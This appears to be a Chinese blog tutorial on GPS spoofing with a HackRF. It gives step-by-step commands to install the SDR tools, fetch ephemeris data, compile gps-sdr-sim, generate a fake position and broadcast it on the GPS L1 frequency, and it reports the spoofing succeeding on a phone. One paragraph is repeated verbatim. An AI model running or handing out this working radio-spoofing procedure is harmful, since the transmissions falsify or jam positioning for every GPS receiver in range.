WiFi定位劫持·續篇——GPS劫持
阿新 • • 發佈:2018-03-02
WiFi安全 GPS 硬件安全 WiFi定位 
安裝完畢之後,接上相應的天線,因為這裏是發射GPS信號,所以需要將一根天線連接ANT端,一根連接OUT端,連接完畢之後如下所示:
在GPS定位中需要用到相應的導航電文,最新的導航電文可以到這個網址找到。
準備工作:
這裏使用的設備是hackrf,所以需要在kali下安運行hackrf的驅動和環境。打開終端,在終端中輸入以下命令:
sudo apt-get install hackrf libhackrf-dev libhackrf0安裝完畢之後,插上hackrf,運行以下命令,可查看hackrf的基本情況如下所示:
hackrf_info
接下來需要安裝一些其他軟件,在終端輸入以下命令:
apt-get install gnuradio gnuradio-dev gr-osmosdr gr-osmosdr gqrx-sdr wireshark安裝成功後,就可以將hackrf的GPS外部時鐘安裝上,要正確安裝安裝的圖片如下所示:
安裝完畢之後,接上相應的天線,因為這裏是發射GPS信號,所以需要將一根天線連接ANT端,一根連接OUT端,連接完畢之後如下所示:
在GPS定位中需要用到相應的導航電文,最新的導航電文可以到這個網址找到。
ftp://cddis.gsfc.nasa.gov/pub/gps/data/daily註意,在這裏我們需要的是最新的導航電文,如果不是最新的導航電文可能會導致實驗失敗。我們可以在這裏點擊最新的年份,這裏選擇2017年的導航電文如下所示:
點擊2017年的導航電文後,拉到最底部找到brdc文件夾,出現如下界面,在其中找到最新的電文,下載下來。如下所示
然後將其中的導航電文解壓出來如下所示:
接下來從git上面下載所需的軟件gps-sdr-sim。在終端輸入如下命令即可:
Git clone https://github.com/osqzss/gps-sdr-sim.git
cd gps-sdr-sim
gcc gpssim.c -lm -O3 -o gps-sdr-sim在這裏需要註意,使用gcc編譯gps-sdr-sim時如果無效,請安裝gcc這個軟件。命令如下:
apt-get install gcc成功後會在當前目錄出現gps-sdr-sim的可執行文件。
然後隨便挑選一個經緯度,這裏選擇的是經度為0,緯度為0。
在當前目錄下,終端上執行如下命令:
./gps-sdr-sim -e brdc0820.17n -l 0,0,100 -b 8 -d 100接下來就是讓hackrf將這個文件中的內容發射出去,註意由於現在的手機基本上都采用GPS定位,基站網格定位,和Wifi定位3種方式合一,所以這裏需要使手機處於飛行模式才可以。在終端輸入如下命令:
hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0 -R可以發現,在欺騙成功後,連接的衛星數量會有明顯的上升。這是因為我們假冒了其中很多的衛星。截圖如下:
GPS劫持前:
GPS劫持後:
WiFi定位劫持·續篇——GPS劫持